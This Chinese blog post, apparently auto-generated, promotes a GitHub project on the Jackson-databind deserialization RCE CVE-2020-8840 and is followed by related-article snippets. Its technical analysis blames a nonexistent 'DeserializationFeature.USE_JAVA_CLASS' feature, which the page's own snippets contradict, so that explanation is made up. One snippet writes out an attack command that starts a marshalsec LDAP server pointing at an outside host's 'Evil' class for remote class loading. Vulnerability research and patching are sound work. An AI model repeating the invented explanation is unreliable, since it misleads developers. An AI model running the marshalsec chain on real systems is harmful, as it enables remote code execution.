探索Jackson库的安全漏洞修复:CVE-2020-8840

最新推荐文章于 2024-08-07 20:45:31 发布
最新推荐文章于 2024-08-07 20:45:31 发布
阅读量580 收藏 5
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00016/article/details/137394762
版权

探索Jackson库的安全漏洞修复:CVE-2020-8840

去发现同类优质开源项目:https://gitcode.com/

项目简介

在中,开发者jas502n分享了对Jackson库中一个关键安全漏洞CVE-2020-8840的研究和修复过程。Jackson是Java最流行的JSON处理库之一,广泛应用于Web服务、后端开发等领域。这个项目旨在帮助用户理解这个漏洞并提供解决方案。

技术分析

CVE-2020-8840是一个远程代码执行漏洞,它允许攻击者通过恶意构造的JSON数据来控制目标系统。该漏洞主要出在Jackson的DeserializationFeature.USE_JAVA_CLASS特性上,当这个特性启用时,Jackson会尝试将接收到的JSON中的@class属性解析为Java类,并实例化对象,这可能导致任意代码被执行。

jas502n通过详细的代码示例和分析,演示了如何触发这个漏洞以及如何防止其发生。他引入了一个修复补丁,该补丁修改了Jackson库的行为,以避免不安全的类加载。

应用场景

  1. 安全审计 - 对于使用Jackson的项目,这是一个很好的学习资源,可以帮助开发者进行安全性审查,确保他们的应用不受此漏洞影响。
  2. 漏洞修复 - 开发者可以参照项目中的修复方案,更新自己的Jackson版本或者手动应用补丁,防止潜在的安全风险。
  3. 教学与研究 - 对于教授软件安全或Java Web开发的学生和教师,这个项目提供了实际的案例,有助于理解JSON序列化安全问题。

特点

  1. 实践导向 - 提供了触发漏洞的实际示例,使得理论知识更具实践价值。
  2. 详细解释 - 深入浅出地解释了问题的根源及修复方法,对初学者友好。
  3. 源码修复 - 包含了修复代码,方便直接应用到项目中。

结语

Jackson-CVE-2020-8840项目不仅揭示了一个重要的安全问题,还展示了如何通过开源社区的力量来解决它。对于任何关心系统安全性的开发者来说,这是一个不可多得的学习机会。如果你的项目依赖Jackson,请务必检查你的版本并采取必要的预防措施。无论是为了提高自身技能,还是为了保护你的应用程序,这个项目都值得一看。

去发现同类优质开源项目:https://gitcode.com/

幸竹任
关注
FasterXML/jackson-databind 远程代码执行漏洞(CVE-2020-8840)复现
玄道的网安博客
12-12 6417
漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 影响版本 2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2 环境搭建 项目地址: h...
Jackson反序列化远程代码执行漏洞(CVE-2020-24616)复现
玄道的网安博客
04-26 2773
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
FasterXML Jackson-databind远程代码执行漏洞 CVE-2020-8840 已亲自复现 未完成
qq_42430287的博客
12-27 1639
受影响版本的jackson-databind中缺少某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter,导致攻击者可通过JNDI注入的方式对此漏洞进行利用,成功时可以实现远程代码执行。2.0.0
Jackson 反序列化漏洞
最新发布
qq_50296568的博客
08-07 1150
CVE-2017-7525 是 Jackson 数据绑定jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
jackson-databind远程代码执行漏洞(CVE-2020-8840修复与测试
Quarrie的博客
05-03 4009
漏洞介绍 攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文中将测试LDAP方式的远程代码调用,受影响版参见:NVD。 修复建议 网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6...
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
CVE-2020-8840:Jackson-databind RCE
Fly_鹏程万里
07-11 2734
影响范围 jackson-databind before 2.9.10.3 jackson-databind before2.8.11.5 jackson-databind before2.7.9.7 漏洞类型 JDNI注入导致RCE 利用条件 开启enableDefaultTyping() 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖 漏洞概述 2020年2月,jackson-databind在github上更新了一个新的反..
CVE-2019-12384 jackson ssrf-rce漏洞复现
ZJT6666666的博客
12-28 833
CVE-2019-12384 jackson ssrf-rce漏洞复现
CVE-2019-12814:CVE-2019-12814
05-26
CVE-2019-12814是一个针对Java Jackson数据绑定的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统被完全控制。Jackson是广泛使用的Java,用于序列化和反序列...
CVE-2020-24616:Jackson 多个反序列化安全漏洞通告 .pdf
09-05
总的来说,对于任何使用Jackson-databind的组织来说,及时了解并修复CVE-2020-24616是非常重要的,以防止潜在的安全威胁。同时,加强网络安全防御体系,包括定期更新软件、实施严格的访问控制和监控策略,也是保障...
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
BertramLAU的专栏
07-23 2060
系统环境 CentOS 7.7.1908 CDH 6.3.1 Jackson-databind 2.9.8/2.9.9/2.9.9.3 漏洞描述 【CVECVE-2019-12384 【漏洞描述】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 【受影响版本】 Jackson-databin
cve-2020-8840.zip
05-03
CVE-2020-8840漏洞测试,简单的漏洞演示,以LDAP服务收到调用请求为准,实际调用类并未编写。
Jackson-databind 反序列化漏洞(CVE-2017-7525)复现
HEAVEN569的博客
03-12 2013
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
阿里fastjson_再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
weixin_39958911的博客
12-02 360
冤冤相报何时了,得饶人处且饶人。本文已被 https://www.yourbatman.cn 收录,里面一并有Spring技术栈、MyBatis、JVM、中间件等小而美的专栏供以免费学习。关注公众号【BAT的乌托邦】逐个击破,深入掌握,✍前言你好,我是YourBatman。今天中午收到我司安全部发了一封邮件:Jackson存在安全漏洞。查了一下,这件事并不算很新鲜了(已经过了10天的样子),本文...
Jackson-databind 反序列化漏洞复现(CVE-2017-7525)
whojoe的博客
05-26 3478
Jackson-databind 反序列化漏洞复现(CVE-2017-7525)环境搭建启动docker下载环境生成docker环境漏洞检测区分 Fastjson 和 Jackson漏洞复现小结参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 也可以使用码云上个人维护的镜像 git clone https://gitee.com/fahawifi/vulhub.git
java jackson漏洞_分析Jackson安全漏洞CVE-2019-12086
weixin_42502775的博客
02-16 983
CVE-2019-12086 DescriptionA Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an e...
CVE-2020-8840复现(xbean-reflect利用链)
ETO发展中心
12-18 1909
CVE-2020-8840复现(xbean-reflect利用链)搭建环境漏洞演示遇到的问题 搭建环境 下载marshalsec并编译,启动jndi环境 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer https://www.youi.xin/#Evil 编写Evil.java,内容如下: public class Evil { public Evil(){ try{
CVE-2020-8840复现
weixin_39811856的博客
07-01 3009
0x00 漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 0x01 环境搭建 搭建一个web服务器,我们采用python3 在web服务器目录放上已经编译好的恶意类 恶意文件内容为: 启动ldap服务 这...
jackson CVE-2017-7525 漏洞复现
Shanfenglan's blog
11-29 1693
CVE-2017-7525 Jackson-databind 反序列化漏洞 原理 Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-ga
Jackson 反序列化漏洞(CVE-2019-14361和CVE-2019-144391修复
07-13
为了修复 Jackson 反序列化漏洞 CVE-2019-14361 和 CVE-2019-14439,你可以采取以下措施: 1. 升级 Jackson-databind :确保你的应用程序使用最新版本的 Jackson-databind 。这些漏洞已在较新的版本中修复,因此升级到最新版本可以解决这些安全问题。 2. 验证输入数据:在反序列化操作之前,始终验证输入数据的合法性。如果数据不符合预期的格式或结构,应该拒绝反序列化操作。 3. 使用白名单机制:考虑使用白名单机制来限制可以被反序列化的类。只允许反序列化应用程序预期的类,而拒绝反序列化其他类。 4. 预防远程代码执行:采取必要的安全措施,如禁用远程代码执行功能,以减少远程代码执行的风险。 5. 定期更新和框架:定期更新和升级你使用的和框架,以确保应用程序的安全性和稳定性。 请注意,这些措施只是一些常见的建议,具体的修复步骤可能因应用程序的特定环境和需求而有所差异。建议在实施修复前仔细评估和测试,以确保不会引入其他问题。此外,及时关注安全公告和厂商的更新信息也是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

幸竹任

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值